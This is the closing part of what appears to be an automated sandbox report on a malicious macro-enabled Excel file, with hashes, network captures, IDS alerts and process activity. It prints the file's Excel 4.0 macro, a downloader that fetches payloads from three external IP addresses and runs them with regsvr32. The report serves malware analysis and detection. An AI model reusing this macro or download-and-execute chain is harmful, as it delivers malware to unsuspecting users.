                                                                                                                                                      Preview: .U.n.0....?..........C....I?`L.,..@N...;....l+........pz.r.z.M.j&.B..6~._.../...^...[..,nf.?L...s.h.[...Rf.....g...........@y=.|.*xBO5..1.~...,Uw+..8../...wE....5....g....B..c.&..s.H.61.VL.H....{5..|..6U...X.M.8...2s8.a.....RM...O^.d4V....8..\Y...r..9.[..r.+...J.8P).y.[.90.5......p.z......,I......S...A....?.%.o.......hF.gZ[..N.!.S.!.~ ......{.N.R,....u....*...x...x..s[.O!f...O7..&...L.......S..vb,.F.G[....7.......PK..........!...Wm............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\Desktop\~$Decline-172917164-06242021.xlsm
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):330
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                      MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                      SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                      SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                      SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.982649799738301
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                      File name:Decline-172917164-06242021.xlsm
                                                                                                                                                      File size:329298
                                                                                                                                                      MD5:f022a2159442cd4e16d7fe3dee1d634b
                                                                                                                                                      SHA1:cd4a698d83059462498e48b8dec47662bd2a0ec4
                                                                                                                                                      SHA256:4bd593279e649fae847a2b702655c571d7ca9e1949a422fa8d289250aeaa3305
                                                                                                                                                      SHA512:ba433280caf91d3ee2b17848d398566e69802e1346573cbe16b4bb77045aa0a8739affcaa27e216018bb6b051dba2b6bf83503a88492b4aa470147c0c716a891
                                                                                                                                                      SSDEEP:6144:97u1GRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZw:97sGRMmEv2Bc/nvm8IKABfsYOmauFq
                                                                                                                                                      File Content Preview:PK..........!.^...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Decline-172917164-06242021.xlsm"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      ,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)",http://5.253.62.174/,"=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)",http://185.117.73.74/,"=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)",http://185.234.247.7/,"=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,=EXEC(Sheet2!O22),,"=EXEC(Sheet2!O22&""1"")",,"=EXEC(Sheet2!O22&""2"")",,,,,,,,,,=HALT(),

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      06/25/21-08:24:40.521992TCP1201ATTACK-RESPONSES 403 Forbidden80491655.253.62.174192.168.2.22
                                                                                                                                                      06/25/21-08:24:41.376990ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.155192.168.2.22
                                                                                                                                                      06/25/21-08:24:45.028969ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.155192.168.2.22
                                                                                                                                                      06/25/21-08:24:51.240465ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.155192.168.2.22
                                                                                                                                                      06/25/21-08:25:04.623723ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                                                                                                                                                      06/25/21-08:25:07.631782ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                                                                                                                                                      06/25/21-08:25:10.979362ICMP399ICMP Destination Unreachable Host Unreachable190.2.158.153192.168.2.22
                                                                                                                                                      06/25/21-08:25:22.914129TCP1201ATTACK-RESPONSES 403 Forbidden8049168185.234.247.7192.168.2.22

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 25, 2021 08:32:53.667958021 CEST4971380192.168.2.35.253.62.174
                                                                                                                                                      Jun 25, 2021 08:32:53.757108927 CEST80497135.253.62.174192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:53.757227898 CEST4971380192.168.2.35.253.62.174
                                                                                                                                                      Jun 25, 2021 08:32:53.757683039 CEST4971380192.168.2.35.253.62.174
                                                                                                                                                      Jun 25, 2021 08:32:53.846487045 CEST80497135.253.62.174192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:53.851843119 CEST80497135.253.62.174192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:53.851985931 CEST4971380192.168.2.35.253.62.174
                                                                                                                                                      Jun 25, 2021 08:32:53.862971067 CEST4971480192.168.2.3185.117.73.74
                                                                                                                                                      Jun 25, 2021 08:32:56.878741980 CEST4971480192.168.2.3185.117.73.74
                                                                                                                                                      Jun 25, 2021 08:33:02.879254103 CEST4971480192.168.2.3185.117.73.74
                                                                                                                                                      Jun 25, 2021 08:33:14.899820089 CEST4973180192.168.2.3185.234.247.7
                                                                                                                                                      Jun 25, 2021 08:33:14.947299957 CEST8049731185.234.247.7192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:14.947421074 CEST4973180192.168.2.3185.234.247.7
                                                                                                                                                      Jun 25, 2021 08:33:14.947978973 CEST4973180192.168.2.3185.234.247.7
                                                                                                                                                      Jun 25, 2021 08:33:14.995266914 CEST8049731185.234.247.7192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:15.139724970 CEST8049731185.234.247.7192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:15.139873981 CEST4973180192.168.2.3185.234.247.7
                                                                                                                                                      Jun 25, 2021 08:33:58.858742952 CEST80497135.253.62.174192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:58.859111071 CEST4971380192.168.2.35.253.62.174
                                                                                                                                                      Jun 25, 2021 08:34:20.142894983 CEST8049731185.234.247.7192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:34:20.142999887 CEST4973180192.168.2.3185.234.247.7
                                                                                                                                                      Jun 25, 2021 08:34:40.077073097 CEST4973180192.168.2.3185.234.247.7
                                                                                                                                                      Jun 25, 2021 08:34:40.078604937 CEST4971380192.168.2.35.253.62.174
                                                                                                                                                      Jun 25, 2021 08:34:40.129116058 CEST8049731185.234.247.7192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:34:40.168159962 CEST80497135.253.62.174192.168.2.3

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 25, 2021 08:32:37.939153910 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:37.988522053 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:38.782896042 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:38.832298994 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:40.556960106 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:40.615883112 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:43.251682043 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:43.299808979 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:47.033843994 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:47.088628054 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:49.039623976 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:49.085679054 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:50.132975101 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:50.223100901 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:50.735555887 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:50.808357000 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:50.993011951 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:51.050067902 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:51.768213987 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:51.827622890 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:52.800882101 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:52.860310078 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:53.359906912 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:53.416754007 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:54.659610987 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:54.715054035 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:54.847382069 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:54.898401022 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:55.752862930 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:55.799288988 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:56.900116920 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:56.950766087 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:58.611547947 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:58.657697916 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:32:58.921495914 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:32:58.972453117 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:00.075756073 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:00.126735926 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:02.043628931 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:02.100590944 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:03.104996920 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:03.153284073 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:04.158364058 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:04.209455967 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:05.223762989 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:05.269764900 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:06.333928108 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:06.391684055 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:13.056876898 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:13.126326084 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:14.218442917 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:14.291284084 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:32.860245943 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:32.907001019 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:34.067969084 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:34.124291897 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:40.971954107 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:41.042362928 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:49.491218090 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:49.561817884 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:33:57.875271082 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:33:57.933243036 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:34:24.497962952 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:34:24.554277897 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:34:59.606204987 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:34:59.680762053 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                      Jun 25, 2021 08:35:00.127561092 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                      Jun 25, 2021 08:35:00.200299025 CEST53606338.8.8.8192.168.2.3

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 5.253.62.174
                                                                                                                                                      • 185.234.247.7

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.3497135.253.62.17480C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Jun 25, 2021 08:32:53.757683039 CEST1121OUTGET /44372.3561747685.dat HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 5.253.62.174
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Jun 25, 2021 08:32:53.851843119 CEST1126INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Fri, 25 Jun 2021 06:32:53 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.349731185.234.247.780C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Jun 25, 2021 08:33:14.947978973 CEST1336OUTGET /44372.3561747685.dat HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 185.234.247.7
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Jun 25, 2021 08:33:15.139724970 CEST1337INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Fri, 25 Jun 2021 06:33:15 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:08:32:48
                                                                                                                                                      Start date:25/06/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x850000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:15
                                                                                                                                                      Start date:25/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 ..\Kro.fis
                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:15
                                                                                                                                                      Start date:25/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 ..\Kro.fis1
                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:16
                                                                                                                                                      Start date:25/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 ..\Kro.fis2
                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >